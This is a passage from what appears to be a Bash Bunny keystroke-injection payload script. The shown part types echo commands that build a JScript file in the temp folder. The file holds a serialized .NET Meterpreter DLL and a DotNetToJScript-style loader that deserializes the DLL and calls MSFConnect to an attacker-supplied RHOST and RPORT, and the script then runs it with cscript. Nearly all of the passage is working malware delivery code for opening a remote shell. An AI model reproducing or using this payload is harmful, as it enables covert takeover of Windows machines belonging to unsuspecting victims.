0,220,50,0,0,0,0,0,0,0,0,0,0,246,50,0,0,0,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,232,50,0,0,0,0,0,0,0,0,0,0,0,0,95,67,111,114,68,108,108,77,97,105,110,0,109,115,99,111,114,101,101,46,100,108,108,0,0,0,0,0,255,37,0,32,0,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,16,0,0,0,24,0,0,128,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,48,0,0,128,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,72,0,0,0,88,64,0,0,124,3,0,0,0,0,0,0,0,0,0,0,124,3,52,0,0,0,86,0,83,0,95,0,86,0,69,0,82,0,83,0,73,0,79,0,78,0,95,0,73,0,78,0,70,0,79,0,0,0,0,0,189,4,239,254,0,0,1,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,63,0,0,0,0,0,0,0,4,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,68,0,0,0,1,0,86,0,97,0,114,0,70,0,105,0,108,0,101,0,73,0,110,0,102,0,111,0,0,0,0,0,36,0,4,0,0,0,84,0,114,0,97,0,110,0,115,0,108,0,97,0,116,0,105,0,111,0,110,0,0,0,0,0,0,0,176,4,220,2,0,0,1,0,83,0,116,0,114,0,105,0,110,0,103,0,70,0,105,0,108,0,101,0,73,0,110,0, >> %temp%\BB-Metasploit-Winx64.js"
Q ENTER
Q STRING "echo 102,0,111,0,0,0,184,2,0,0,1,0,48,0,48,0,48,0,48,0,48,0,52,0,98,0,48,0,0,0,26,0,1,0,1,0,67,0,111,0,109,0,109,0,101,0,110,0,116,0,115,0,0,0,0,0,0,0,34,0,1,0,1,0,67,0,111,0,109,0,112,0,97,0,110,0,121,0,78,0,97,0,109,0,101,0,0,0,0,0,0,0,0,0,84,0,22,0,1,0,70,0,105,0,108,0,101,0,68,0,101,0,115,0,99,0,114,0,105,0,112,0,116,0,105,0,111,0,110,0,0,0,0,0,67,0,83,0,104,0,97,0,114,0,112,0,45,0,77,0,101,0,116,0,101,0,114,0,112,0,114,0,101,0,116,0,101,0,114,0,68,0,76,0,76,0,0,0,48,0,8,0,1,0,70,0,105,0,108,0,101,0,86,0,101,0,114,0,115,0,105,0,111,0,110,0,0,0,0,0,49,0,46,0,48,0,46,0,48,0,46,0,48,0,0,0,84,0,26,0,1,0,73,0,110,0,116,0,101,0,114,0,110,0,97,0,108,0,78,0,97,0,109,0,101,0,0,0,67,0,83,0,104,0,97,0,114,0,112,0,45,0,77,0,101,0,116,0,101,0,114,0,112,0,114,0,101,0,116,0,101,0,114,0,68,0,76,0,76,0,46,0,100,0,108,0,108,0,0,0,72,0,18,0,1,0,76,0,101,0,103,0,97,0,108,0,67,0,111,0,112,0,121,0,114,0,105,0,103,0,104,0,116,0,0,0,67,0,111,0,112,0,121,0,114,0,105,0,103,0,104,0,116,0,32,0,169,0,32,0,32,0,50,0,48,0,49,0,55,0,0,0,42,0,1,0,1,0,76,0,101,0,103,0,97,0,108,0,84,0,114,0,97,0,100,0,101,0,109,0,97,0,114,0,107,0,115,0,0,0,0,0,0,0,0,0,92,0,26,0,1,0,79,0,114,0,105,0,103,0,105,0,110,0,97,0,108,0,70,0,105,0,108,0,101,0,110,0,97,0,109,0,101,0,0,0,67,0,83,0,104,0,97,0,114,0,112,0,45,0,77,0,101,0,116,0,101,0,114,0,112,0,114,0,101,0,116,0,101,0,114,0,68,0,76,0,76,0,46,0,100,0,108,0,108,0,0,0,76,0,22,0,1,0,80,0,114,0,111,0,100,0,117,0,99,0,116,0,78,0,97,0,109,0,101,0,0,0,0,0,67,0,83,0,104,0,97,0,114,0,112,0,45,0,77,0,101,0,116,0,101,0,114,0,112,0,114,0,101,0,116,0,101,0,114,0,68,0,76,0,76,0,0,0,52,0,8,0,1,0,80,0,114,0,111,0,100,0,117,0,99,0,116,0,86,0,101,0,114,0,115,0,105,0,111,0,110,0,0,0,49,0,46,0,48,0,46,0,48,0,46,0,48,0,0,0,56,0,8,0,1,0,65,0,115,0,115,0,101,0,109,0,98,0,108,0,121,0,32,0,86,0,101,0,114,0,115,0,105,0,111,0,110,0,0,0,49,0,46,0,48,0,46,0,48,0,46,0,48,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,48,0,0,12,0,0,0,8,51,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,13, >> %temp%\BB-Metasploit-Winx64.js"
Q ENTER
Q STRING "echo 0,0,0,4,0,0,0,9,23,0,0,0,9,6,0,0,0,9,22,0,0,0,6,26,0,0,0,39,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,65,115,115,101,109,98,108,121,32,76,111,97,100,40,66,121,116,101,91,93,41,8,0,0,0,10,11]; >> %temp%\BB-Metasploit-Winx64.js"
Q ENTER
Q STRING "echo var entry_class = 'MeterPreter'; >> %temp%\BB-Metasploit-Winx64.js"
Q ENTER
Q STRING "echo try { >> %temp%\BB-Metasploit-Winx64.js"
Q ENTER
Q STRING "echo var stm = new ActiveXObject('System.IO.MemoryStream'); >> %temp%\BB-Metasploit-Winx64.js"
Q ENTER
Q STRING "echo var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter'); >> %temp%\BB-Metasploit-Winx64.js"
Q ENTER
Q STRING "echo var al = new ActiveXObject('System.Collections.ArrayList') >> %temp%\BB-Metasploit-Winx64.js"
Q ENTER
Q STRING "echo for (i in serialized_obj) { >> %temp%\BB-Metasploit-Winx64.js"
Q ENTER
Q STRING "echo stm.WriteByte(serialized_obj[i]); >> %temp%\BB-Metasploit-Winx64.js"
Q ENTER
Q STRING "echo } >> %temp%\BB-Metasploit-Winx64.js"
Q ENTER
Q STRING "echo stm.Position = 0; >> %temp%\BB-Metasploit-Winx64.js"
Q ENTER
Q STRING "echo var n = fmt.SurrogateSelector; >> %temp%\BB-Metasploit-Winx64.js"
Q ENTER
Q STRING "echo var d = fmt.Deserialize_2(stm); >> %temp%\BB-Metasploit-Winx64.js"
Q ENTER
Q STRING "echo al.Add(n); >> %temp%\BB-Metasploit-Winx64.js"
Q ENTER
Q STRING "echo var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class); >> %temp%\BB-Metasploit-Winx64.js"
Q ENTER
Q STRING "echo o.MSFConnect(RHOST, RPORT); >> %temp%\BB-Metasploit-Winx64.js"
Q ENTER
Q STRING "echo } catch (e) { >> %temp%\BB-Metasploit-Winx64.js"
Q ENTER
Q STRING "echo WScript.Echo(e.message); >> %temp%\BB-Metasploit-Winx64.js"
Q ENTER
Q STRING "echo } >> %temp%\BB-Metasploit-Winx64.js"
Q ENTER
LED R
Q DELAY 1000
Q STRING "cscript.exe %temp%\BB-Metasploit-Winx64.js"
Q ENTER
LED B
Q DELAY 1000
shutdown 0